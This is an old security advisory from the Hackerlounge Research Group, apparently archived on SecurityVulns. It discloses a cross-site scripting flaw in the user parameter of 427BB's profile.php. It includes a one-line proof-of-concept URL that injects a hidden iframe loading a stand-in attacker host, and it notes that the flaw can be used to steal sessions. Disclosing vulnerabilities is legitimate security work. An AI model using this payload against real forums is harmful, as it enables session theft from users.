427BB profile.php XSS vulnerability.

2005-03-01T00:00:00
ID SECURITYVULNS:DOC:7961
Type securityvulns
Reporter Securityvulns
Modified 2005-03-01T00:00:00

Description

[][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]
[]
[] HRG - Hackerlounge Research Group [] Release: HRG007 [] Monday 03/01/05 [] 427BB
[]
[] The author can't be held responsible for any damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]

Vulnerable: 427BB (Any Version)


General Information:

427BB Is a simple board and I have no idea why I'm releasing this because Its Very unpopular But I said What the hell. Its based on PHP And MySQL


Description:

In profile.php there is a user var that is vulnerable to a XSS attack by a remote attacker. The user string isn't filtered of < > or ". This makes is very easy for a attacker to steal a session and many other things.


PoC Code
Place the following code into the the url then reload the profile page and it will execute this code.

profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E

This is very unsafe and vuln because you can execute any code you would like and can lead to manger damage of the forum you are attacking.


Fix and Vendor status:

Vendor has been notified, expect official patch soon.


Greetz:

All the people at hackerlounge.com, JWT, TGS-Security.com and JWT-Security.net. Specifically:

Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, Modzilla, Pingu, Jake Johnson, Afterburn, airo, cardiaC, chis, ComputerGeek, deep_phreeze, dudley, evasion, eXtacy, Mattewan, Afterburn, Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, Slarty, NoUse, Snake (I hate you), Surreal (I hate you), -=Vanguard=-, The_IRS, puNKiey, driedice, Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, voteforpedro, Cryptic_Override, kodaxx, ~CreEpy~NoDquE~, Brainscan, the_exode, phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and anyone else I forgot.


Credit:

HRG - Hackerlounge Research Group http://www.Hackerlounge.com

Partial credit is also given to lancastertechnologies.org, founded by JWT.

[][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]
[]
[] HRG - Hackerlounge Research Group [] Release: HRG007 [] Monday 03/01/05 [] 427BB
[]
[] The author can't be held responsible for any damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]